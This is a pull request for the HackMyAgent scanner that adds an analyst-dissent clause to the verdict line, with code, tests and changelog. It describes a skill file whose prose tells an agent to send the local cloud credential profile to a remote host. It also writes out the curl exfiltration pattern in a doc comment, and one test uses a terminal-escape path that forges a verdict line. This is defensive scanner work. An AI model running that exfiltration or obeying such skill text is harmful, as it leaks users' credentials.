### PR TITLE
Say on the verdict line when the analyst dissents

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,66 @@ All notable changes to HackMyAgent are documented in this file.
 
 ## [Unreleased]
 
+### The verdict line now says when the analyst dissents
+
+`secure --nanomind` could route a file to a named attack class at high severity and still
+print a verdict saying the tree was fine. The escalation is advisory and non-scoring by
+design ([CDS-024]: the analyst carries a measured ~22% false-positive rate on dual-use
+security code, so it does not auto-apply), and it renders in the NanoMind Coverage
+Escalations footer — well below the verdict line, which is what a reader anchors on.
+
+Measured on `8c767f6`, a skill whose prose instructs the agent to read the local cloud
+credential profile and POST it to a remote endpoint, with a complete `.gitignore` so the
+deterministic suite has nothing to say:
+
+| | before | after |
+|---|---|---|
+| Security | `100/100` | `100/100` |
+| exit code | `0` | `0` |
+| Verdict | `No security issues detected. This library looks safe to use.` | `… looks safe to use. (analyst dissents on 1 file — see NanoMind Coverage Escalations)` |
+| footer | `REVIEW .claude/skills/helper/SKILL.md prompt_injection (critical)` | unchanged |
+
+The advisory contract is untouched where it counts: the score, the exit code and the finding
+list are identical. The line does come off the green — a verdict already carrying `good`
+tone drops to `warning`, for the reason the two disclosure branches beside it give in their
+own words, that "green here is what made the pre-fix output read as an all-clear". Colour is
+read faster than the sentence, and a bold-green line announcing a named attack class at high
+severity would have left half this defect open. The downgrade is one-way and only from
+`good`: a fail-direction verdict keeps its tone, so the advisory channel can withdraw an
+all-clear it disagrees with but can never soften a failing verdict into something calmer.
+Only `attack`-routed escalations reach it —
+`abstain` is the model hedging on benign-but-security-shaped content, is hidden from the
+footer by default for that reason, and would spend the line's credibility on parser noise.
+With no attack-routed escalation the suffix is empty and the line is byte-identical.
+
+The clause is appended as the **last** mutation of the rendered verdict value, which is the
+whole of the fix rather than an implementation detail. Two disclosure branches assign that
+value outright instead of appending to it — the coverage-gap disclosure and the #200
+quick-scan disclosure — and both are gated on `totalFindings === 0`. Escalations are never
+counted into findings, so that gate is exactly the scan where a dissent is the only adverse
+signal in the output. The coverage-gap branch is the one that bites: it fires on
+hackmyagent's own self-scan. (The quick-scan branch is defensive — its only call site passes
+no escalations today.) Composed onto `buildVerdict`'s message, the clause was silently
+deleted in the one case it exists for; measured with the gate forced on, the verdict read
+`No issues in what was examined — but …` with the dissent nowhere on the line and the footer
+still showing it. The live path is confirmed directly: under `--scan-depth quick` the
+coverage-gap branch assigns the verdict value and the clause still survives.
+
+That ordering carries **no automated guard**, and the honest reason is worth recording. Three
+successive source-grep guards were written for it and all three were defeated — by an alias,
+by bracket access with a template key, by `Object.defineProperty`, and finally by
+`const sink = verdictDisplay!;`, the non-null idiom the same function already uses. Each
+defeat left the suite green while the clause was erased at runtime, and each repair added a
+coverage claim that was itself false. A guard indistinguishable from its absence is not a
+guard, and one advertising class coverage it lacks is worse than none, so it was deleted
+rather than extended a fourth time. The invariant is held by the comment at the append site
+and by nothing else. The behavioural test that would close it needs no analyst daemon — the
+render can be driven by swapping the orchestrator export in `require.cache` — and is tracked
+in #560.
+
+`buildVerdict` is exported from `@opena2a/cli-ui` (pinned `0.5.2`), so the clause is composed
+in `hackmyagent` rather than in the renderer — no cross-package release.
+
 ### The ARP re-export now delivers opt-in telemetry
 
 `hackmyagent/arp` is a thin re-export of `@opena2a/aim-sdk/arp` (#249), so the pin in

--- a/__tests__/ui/analyst-dissent.test.ts
+++ b/__tests__/ui/analyst-dissent.test.ts
@@ -1,0 +1,172 @@
+// The verdict line says when the analyst dissents.
+//
+// The defect: a credential-exfiltrating shell script scores a clean 100, because
+// the deterministic checks key on credentials PRESENT in a file, not on a
+// command that STEALS them. The analyst can route such a file to `attack` at
+// high severity, but that escalation is advisory and non-scoring by [CDS-024]
+// (~22% measured FP rate on dual-use security code), so it rendered only in a
+// footer below a verdict line saying the tree was fine. Measured 2026-08-23 on
+// 8c767f6, one `.sh` holding a single exfiltrating curl beside a complete
+// `.gitignore`:
+//
+//   Security  100/100
+//   Verdict   No security issues detected. This library looks safe to use.
+//
+// An earlier draft cited 98/100 for this. That number was the same fixture
+// WITHOUT a `.gitignore` — 98 was an unrelated `Missing .gitignore` finding,
+// not the exfiltration. The blind spot is a clean 100.
+//
+// What is below is the PURE half only: the rule for which escalations count and
+// what the clause says. That half is easy to get right. The hard half — WHERE
+// the clause is appended — is deliberately not tested here; see the block after
+// `analystDissentSuffix` for why, and for the seam that would close it.
+//
+// Do not re-add a source-grep guard for the ordering. Three were written and
+// three were defeated, each leaving this suite green while the clause was
+// erased at runtime.
+
+import { describe, it, expect } from 'vitest';
+import { readFileSync } from 'node:fs';
+import { join } from 'node:path';
+import {
+  analystDissentSuffix,
+  dissentingFiles,
+  type DissentingEscalation,
+} from '../../src/ui/analyst-dissent';
+
+const attack = (file: string): DissentingEscalation => ({ file, routed: 'attack' });
+const abstain = (file: string): DissentingEscalation => ({ file, routed: 'abstain' });
+
+describe('dissentingFiles', () => {
+  it('returns the files the analyst routed to attack', () => {
+    expect(dissentingFiles([attack('.mcp.json')])).toEqual(['.mcp.json']);
+  });
+
+  it('excludes abstains — the abstention gate absorbs model hedges, and they must not reach the verdict line', () => {
+    expect(dissentingFiles([abstain('a.md'), abstain('b.md')])).toEqual([]);
+  });
+
+  it('counts only the attack half of a mixed set', () => {
+    expect(dissentingFiles([abstain('a.md'), attack('b.json'), abstain('c.md')])).toEqual(['b.json']);
+  });
+
+  it('counts a file once when a producer emits two escalations for it', () => {
+    expect(dissentingFiles([attack('.mcp.json'), attack('.mcp.json')])).toEqual(['.mcp.json']);
+  });
+
+  it('is empty for undefined and for an empty array', () => {
+    expect(dissentingFiles(undefined)).toEqual([]);
+    expect(dissentingFiles([])).toEqual([]);
+  });
+});
+
+describe('analystDissentSuffix', () => {
+  it('names the dissent and points at the section that renders it', () => {
+    expect(analystDissentSuffix([attack('.mcp.json')])).toBe(
+      ' (analyst dissents on 1 file — see NanoMind Coverage Escalations)',
+    );
+  });
+
+  it('pluralises on more than one file', () => {
+    expect(analystDissentSuffix([attack('a.json'), attack('b.json')])).toBe(
+      ' (analyst dissents on 2 files — see NanoMind Coverage Escalations)',
+    );
+  });
+
+  it('carries a count and a section name, never a path', () => {
+    // Escalation `file` values come out of the scanned tree and are
+    // attacker-influenced. The footer escapes them with `escapePathForDisplay`
+    // before printing a row; putting a second, differently-escaped copy on the
+    // most-read line in the output is the thing this clause avoids.
+    const hostile = 'evil\u001b[2J/\nVerdict   No security issues detected./.mcp.json';
+    const suffix = analystDissentSuffix([attack(hostile)]);
+    expect(suffix).not.toContain('.mcp.json');
+    expect(suffix).not.toContain('\u001b');
+    expect(suffix).not.toContain('\n');
+    expect(suffix).toBe(' (analyst dissents on 1 file — see NanoMind Coverage Escalations)');
+  });
+
+  it('is empty with no escalations, so the caller can append unconditionally', () => {
+    expect(analystDissentSuffix(undefined)).toBe('');
+    expect(analystDissentSuffix([])).toBe('');
+    expect(analystDissentSuffix([abstain('a.md')])).toBe('');
+  });
+});
+
+// ── What is NOT guarded here, and why ────────────────────────────────────
+//
+// The clause must be appended as the LAST mutation of `verdictDisplay.value`:
+// two disclosure branches ASSIGN that value outright, both gated on
+// `totalFindings === 0`, which is exactly the scan where a dissent is the only
+// adverse signal. Composed any earlier it is silently deleted in the one case
+// it exists for.
+//
+// THERE IS NO TEST FOR THAT HERE, deliberately. Three successive versions of a
+// source-grep guard were each defeated by a spelling its author had not
+// thought of — an alias, bracket access with a template key,
+// `Object.defineProperty`, and finally `const sink = verdictDisplay!;`, which
+// is the `!` idiom this very file already uses. Each defeat left the suite
+// green while the clause was erased at runtime, and each fix added a new
+// coverage claim that was itself false.
+//
+// A guard that cannot be distinguished from its absence is not a guard, and
+// one that advertises class coverage it does not have is worse than none: it
+// buys a reader confidence that is not there. So it is deleted rather than
+// extended a fourth time.
+//
+// The real test is behavioural and is now known to be cheap: the render can be
+// driven end-to-end with no analyst daemon and no model by swapping the
+// orchestrator export in `require.cache` and spawning the built CLI. That is
+// tracked in #560 and is the only
+// thing that closes this class. Until it lands, the invariant is held by the
+// comment at the append site in `cli.ts`, and by nothing else. Say so.
+
+describe('a malformed escalation does not crash the render EARLIER than before', () => {
+  // Scope note, because the obvious stronger claim is false: this does NOT make
+  // a malformed escalation survivable. The footer at `cli.ts` still does
+  // `allEscalations.filter(...)` and still dereferences `esc.file`, so a `null`
+  // element still kills the run — as it did before this change. What the guard
+  // buys is that the crash lands no earlier than it used to: without it, the
+  // throw moves up and takes the Categories and Verdict lines with it.
+  const bad = (v: unknown) => analystDissentSuffix(v as never);
+
+  it('returns empty rather than throwing on a null element', () => {
+    expect(() => bad([null])).not.toThrow();
+    expect(bad([null])).toBe('');
+  });
+
+  it('returns empty rather than throwing on a non-array with a length', () => {
+    expect(() => bad({ length: 2 })).not.toThrow();
+    expect(bad({ length: 2 })).toBe('');
+  });
+
+  it('ignores an element with no routed field', () => {
+    expect(bad([{ file: 'a.md' }])).toBe('');
+  });
+});
+
+describe('the clause comes off the green', () => {
+  const cli = readFileSync(join(__dirname, '../../src/cli.ts'), 'utf8');
+
+  it('downgrades a good tone to warning, and only from good', () => {
+    // Both sibling disclosure branches drop green with an explicit comment
+    // saying why. This one discloses a named attack class at HIGH/CRITICAL and
+    // must not be the exception. One-way: a critical/warning verdict keeps its
+    // tone, so the advisory channel can withdraw an all-clear but never soften
+    // a fail-direction verdict. Verified by pty capture: 32m -> 33m.
+    expect(cli).toContain("if (dissentSuffix !== '' && verdictDisplay.tone === 'good')");
+    expect(cli).toContain("verdictDisplay.tone = 'warning'");
+  });
+});
+
+describe('the footer headline and the clause count the same way', () => {
+  const cli = readFileSync(join(__dirname, '../../src/cli.ts'), 'utf8');
+
+  it('derives the attack-route footer count from dissentingFiles', () => {
+    // Two attack escalations on one path printed "dissents on 1 file" beside
+    // "flagged 2 files" — two numbers for one scan, from two derivations.
+    // NOTE the abstain headline two lines below it still counts entries; that
+    // is pre-existing and untouched here.
+    expect(cli).toContain('const flaggedCount = dissentingFiles(allEscalations).length;');
+  });
+});

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -57,6 +57,7 @@ import {
 } from './index';
 import { resolveAndLogMcpShorthand } from './resolve-mcp';
 import { suppressedCategoryLabels, unresolvedCategoryNames } from './ui/unresolved-categories';
+import { analystDissentSuffix, dissentingFiles } from './ui/analyst-dissent';
 import { WildScanner, type WildScanReport } from './wild';
 import { buildCheckOutput, buildNotFoundOutput, mapScanStatusForMeter, translateDownloadError } from '@opena2a/check-core';
 import {
@@ -1979,6 +1980,9 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
         line: f.line,
       })),
     );
+    // NOTE: the analyst-dissent clause is NOT composed onto this object. It is
+    // appended to the rendered `verdictDisplay.value` below, after the two
+    // branches that assign that value outright. See `analystDissentSuffix`.
 
     // Artifact-intent honesty pass (#252). The classifier over-flags benign
     // and OOD input at max confidence, so its raw label is only printed when
@@ -2327,6 +2331,43 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
           console.log(`  ${colors.dim}${contIndent}${disclosure}${RESET()}`);
         }
       }
+    }
+
+    // The verdict line says when the analyst dissents — otherwise it could
+    // assert a clean result while the tool held a named attack class at high
+    // severity, mentioned only in the footer far below. Rationale and the
+    // attack-only rule: `ui/analyst-dissent.ts`.
+    //
+    // LAST mutation of `verdictDisplay.value`, deliberately. The two
+    // disclosure branches above ASSIGN this value rather than appending to it,
+    // and both are gated on `totalFindings === 0` — exactly when a dissent is
+    // the only adverse signal in the output. Composed any earlier, the clause
+    // is silently deleted in the one case it exists for. Anything added below
+    // that rewrites this value has to append, not assign.
+    //
+    // The coverage-gap branch is the live one: it fires on hackmyagent's own
+    // self-scan. The #200 quick-scan branch is defensive — its only call site
+    // passes no escalations today, so it cannot co-occur with a dissent yet.
+    //
+    // Neither score nor exit code reads this object, so neither can move.
+    // Empty when there is no attack-routed escalation, so the line — tone
+    // included — stays byte-identical.
+    const dissentSuffix = analystDissentSuffix(opts.analystEscalations);
+    verdictDisplay.value += dissentSuffix;
+    // ...and it comes off the green, for the reason the two branches above
+    // already give in their own words: "green here is what made the pre-fix
+    // output read as an all-clear". Painting a disclosure of a named attack
+    // class at HIGH/CRITICAL in bold green would leave half this defect open —
+    // the module opens by saying `98/100` is what a user reads as safe, and
+    // colour is read faster than the sentence.
+    //
+    // Only DOWNGRADES, and only from `good`. A verdict already `critical` or
+    // `warning` keeps its tone: the advisory channel is allowed to withdraw an
+    // all-clear it disagrees with, never to soften a fail-direction verdict
+    // into something calmer. That asymmetry is the whole of what makes this
+    // not a repaint.
+    if (dissentSuffix !== '' && verdictDisplay.tone === 'good') {
+      verdictDisplay.tone = 'warning';
     }
 
     for (const line of [categoriesLine, verdictDisplay]) {
@@ -2745,7 +2786,14 @@ function displayUnifiedCheck(opts: UnifiedCheckDisplayOptions): void {
   const hiddenAbstains = allEscalations.length - escalations.length;
   if (allEscalations.length > 0) {
     divider('NanoMind Coverage Escalations');
-    const flaggedCount = allEscalations.filter(e => e.routed === 'attack').length;
+    // Counted through `dissentingFiles`, the same function the verdict clause
+    // counts through, so the headline and that clause cannot report different
+    // numbers for one scan. This line said "flagged N files" off an ENTRY
+    // count; the clause says "dissents on N file". Two escalations on one path
+    // printed "1 file" beside "flagged 2 files" — a contradiction the reader
+    // has no way to resolve. Byte-identical while the producer stays
+    // one-per-candidate; correct if it ever stops being.
+    const flaggedCount = dissentingFiles(allEscalations).length;
     const headline = flaggedCount > 0
       ? `Advisory — the AI analyst flagged ${flaggedCount} file${flaggedCount === 1 ? '' : 's'} the deterministic checks did not.`
       : `Advisory — the AI analyst was uncertain about ${allEscalations.length} file${allEscalations.length === 1 ? '' : 's'} the deterministic checks did not flag.`;

--- a/src/ui/analyst-dissent.ts
+++ b/src/ui/analyst-dissent.ts
@@ -1,0 +1,161 @@
+/**
+ * The verdict line says when the analyst dissents.
+ *
+ * A shell script whose only purpose is exfiltrating the local cloud credential
+ * profile to a remote host scores **100/100, "No security issues detected.
+ * This library looks safe to use.", exit 0** — measured 2026-08-23 on
+ * `8c767f6`, one `.sh` holding a single `curl -X POST <remote> -d @<profile>`
+ * beside a complete `.gitignore`.
+ *
+ * The deterministic checks have nothing to say about it: they key on
+ * credentials *present* in a file, not on a command that *steals* them.
+ *
+ * Do NOT cite the `.mcp.json` form of this as the example. The same curl
+ * inside an MCP server config IS caught — `"command":"sh"` plus `-c` fires a
+ * CRITICAL `Remote Instruction Fetch`, 69/100, exit 1 — so the blind spot is
+ * specific to artifact types the MCP rules do not cover, not to exfiltration
+ * generally. An earlier draft of this file claimed the `.mcp.json` scored
+ * 98/100 and was missed; it does not, and it is not.
+ *
+ * The analyst is the channel that can cover this class, because it reads
+ * behaviour rather than shape. Its escalation is advisory and non-scoring by
+ * [CDS-024] — the analyst carries a measured ~22% false-positive rate on
+ * dual-use security code — so it renders in a footer well below a verdict
+ * line that says the tree is fine.
+ *
+ * That design is deliberate and is NOT changed here. The score, the exit code
+ * and the advisory-only contract are untouched; this module adds no channel
+ * and suppresses none. The problem it closes is narrower: the verdict line
+ * asserted a clean result while the tool was holding a high-severity dissent
+ * it did not mention, and `98/100` is what a user reads as safe.
+ *
+ * `buildVerdict` lives in `@opena2a/cli-ui` (pinned `0.5.2`), not in this
+ * repo, so the clause is composed in `cli.ts` rather than inside the renderer
+ * — a cross-package release to add a suffix would be the more expensive half
+ * of this change. Where in `cli.ts` is not a free choice; see below.
+ *
+ * Split out of `cli.ts` for the same reason as `unresolved-categories.ts`: so
+ * the rule for which escalations count is exercisable without running a scan.
+ *
+ * That is the PURE half. The ORDERING half — that the clause must be appended
+ * last — has no test, and three attempts to guard it by grepping `cli.ts` were
+ * each defeated. It is reproducible end-to-end without a daemon or a model by
+ * swapping the orchestrator export in `require.cache` and spawning
+ * `dist/cli.js`; that is tracked in #560 and is the only thing that
+ * closes the class.
+ */
+
+/**
+ * The part of an analyst escalation this module reads.
+ *
+ * Deliberately two fields out of the nine on `AnalystEscalation`: the clause
+ * counts files and nothing else, so `summary`, `attackClass`, `classification`
+ * and `severity` — model-derived text produced while reading an
+ * attacker-controlled artifact — are not in scope here and cannot reach the
+ * verdict line through it.
+ */
+export interface DissentingEscalation {
+  file: string;
+  routed: 'attack' | 'abstain';
+}
+
+/**
+ * Distinct files the analyst routed to `attack`.
+ *
+ * ATTACK ONLY, and that is the load-bearing half. `abstain` is the model
+ * hedging or parser noise ("confidence: 0.15") on benign-but-security-shaped
+ * content; those are hidden from the escalations footer by default for that
+ * reason, and they must not reach the verdict line either. A verdict that
+ * announced a "dissent" over a 0.15-confidence shrug would spend the line's
+ * credibility on exactly the noise the abstention gate exists to absorb, and
+ * the next real dissent would read as more of the same.
+ *
+ * Counted as distinct `file` STRINGS, because the rendered clause says "file".
+ * Not distinct filesystem objects: `a.md` and `./a.md` are two here. That is
+ * adequate only because the producer emits `relative()`-normalised paths, at
+ * most one per selected candidate — a single `escalations.push` inside
+ * `for (const candidate of selected)` in `nanomind-core/orchestrate.ts`, over
+ * a candidate set partitioned by one `walkDir` in `scanner-bridge.ts`. Both
+ * halves of that are load-bearing; if either changes, this counts wrong.
+ *
+ * The escalations footer is fed from this same function so its headline and
+ * this clause cannot report different numbers for one scan.
+ *
+ * Returns paths, not a count, so a caller that wants to name them does not
+ * have to re-derive the set from a different filter than the one the number
+ * came from. Those paths are RAW — they come out of the scanned tree and are
+ * attacker-influenced. Any caller that renders one must put it through
+ * `escapePathForDisplay` first, as the footer does.
+ */
+export function dissentingFiles(
+  escalations: readonly DissentingEscalation[] | undefined,
+): string[] {
+  if (!Array.isArray(escalations) || escalations.length === 0) return [];
+  const files = new Set<string>();
+  for (const e of escalations) {
+    // Per-element guard, not just a per-array one. The field is typed `any[]`
+    // at the call site, so nothing upstream is holding this shape for us.
+    //
+    // Scope, stated because the stronger claim is false: this does NOT make a
+    // malformed escalation survivable. The footer still filters and still
+    // dereferences `esc.file`, so a `null` element kills the run here exactly
+    // as it did before this change. What the guard buys is that the throw
+    // lands no EARLIER than it used to — without it, it moves up and takes the
+    // Categories and Verdict lines with it.
+    if (!e || e.routed !== 'attack') continue;
+    files.add(typeof e.file === 'string' ? e.file : '');
+  }
+  return [...files];
+}
+
+/**
+ * Clause appended to the verdict message when the analyst dissents.
+ *
+ * Empty string when it does not, so the caller appends unconditionally and
+ * the no-dissent line stays byte-identical — same contract as
+ * `clampDisclosure` in `verdict-band.ts`.
+ *
+ * The clause carries a COUNT and a section name, never a path. Escalation
+ * `file` values come out of the scanned tree and are attacker-influenced;
+ * the footer escapes them with `escapePathForDisplay` before printing a row.
+ * Naming a file here would put a second, differently-escaped copy of a
+ * tree-derived path on HMA's most-read line — so this one points at the
+ * section that already renders them safely instead.
+ */
+export function analystDissentSuffix(
+  escalations: readonly DissentingEscalation[] | undefined,
+): string {
+  const count = dissentingFiles(escalations).length;
+  if (count === 0) return '';
+  return ` (analyst dissents on ${count} file${count === 1 ? '' : 's'} — see NanoMind Coverage Escalations)`;
+}
+
+/**
+ * WHERE THIS GETS APPENDED, and why it is not obvious.
+ *
+ * `cli.ts` applies this to the RENDERED `verdictDisplay.value`, as the last
+ * mutation before the line is printed — not to `buildVerdict`'s `message`,
+ * which is the intuitive place and is wrong.
+ *
+ * `renderObservationsBlock` copies `verdict.message` into the `Verdict` line's
+ * `value`, and two branches downstream then ASSIGN that value outright rather
+ * than appending to it: the coverage-gap disclosure ("No issues in what was
+ * examined — but …") and the #200 quick-scan disclosure. Both are gated on
+ * `totalFindings === 0`.
+ *
+ * That gate is the problem. Escalations are advisory and never counted into
+ * findings, so `totalFindings === 0` is precisely the scan where a dissent is
+ * the ONLY adverse signal in the output — and a clause composed onto
+ * `message` upstream is silently deleted there, in the one case it exists for.
+ *
+ * Which of the two actually bites, measured rather than assumed:
+ *
+ * - COVERAGE-GAP: live. `secure` passes escalations and reaches this branch —
+ *   it fires on hackmyagent's own self-scan ("but 7 stopped at a file cap").
+ *   This one is why the ordering is not negotiable.
+ * - QUICK-SCAN: defensive only, today. Its sole trigger is the `check
+ *   skill:`/`check mcp:` call site, and that call site passes no
+ *   `analystEscalations` at all, so a dissent and this branch cannot currently
+ *   co-occur. Do not cite it as evidence the ordering is needed; it is here
+ *   because wiring escalations into `check` would silently re-open the hole.
+ */


### PR DESCRIPTION
## What changes

`secure --nanomind` could route a file to a named attack class at high severity and still print a verdict saying the tree was fine. The escalation is advisory and non-scoring by design (the analyst carries a measured ~22% false-positive rate on dual-use security code, so it does not auto-apply) and it renders in the NanoMind Coverage Escalations footer, below the verdict line a reader anchors on.

The verdict line now carries the dissent, and comes off the green:

```
Security  100/100
Verdict   No security issues detected. This library looks safe to use. (analyst dissents on 1 file — see NanoMind Coverage Escalations)
REVIEW    .claude/skills/helper/SKILL.md  credential_abuse (critical)
```

Score, exit code, finding list and footer are unchanged. Measured with this branch's build against an `origin/main` (8c767f6) build:

| fixture | base | head |
|---|---|---|
| exfiltrating `.sh` beside a `.gitignore`, no `--nanomind` | 98/100, exit 0 | byte-identical |
| exfiltrating `.mcp.json`, no `--nanomind` | 69/100, exit 1 | byte-identical |
| empty directory | 98/100, exit 0 | byte-identical |
| credential-collecting skill, `--nanomind` | 100/100, exit 0, clean verdict | 100/100, exit 0; exactly one line differs — the verdict clause |

The tone downgrade is one-way and only from `good`: a `warning` or `critical` verdict keeps its tone, so the advisory channel can withdraw an all-clear it disagrees with but never softens a fail-direction verdict.

## Where the clause is appended, and why that is the change

It is the last mutation of the rendered verdict value. Two disclosure branches assign that value outright — the coverage-gap disclosure and the #200 quick-scan disclosure — and both are gated on `totalFindings === 0`, which is exactly the scan where a dissent is the only adverse signal, because escalations are never counted into findings. Composed onto `buildVerdict`'s message upstream, the clause was deleted in the one case it exists for. The coverage-gap branch is live: it fires on this repo's own self-scan.

## Deliberately not here

- **No source-grep guard for the ordering.** Three were written and each was defeated by a spelling it did not anticipate (an alias, bracket access with a template key, `Object.defineProperty`, `const sink = verdictDisplay!;`), every one leaving the suite green while the clause was erased at runtime. Deleting the append leaves `npm test` green today. The behavioural test that closes that is #560.
- `buildVerdict` ships from `@opena2a/cli-ui` (0.5.2) and is untouched — no cross-package release.
- Abstain-routed escalations never reach the line; they stay hidden from the footer by default for the same reason.
- The clause carries a count and a section name, never a tree-derived path.

Found while root-causing #541. Follow-up: #560.
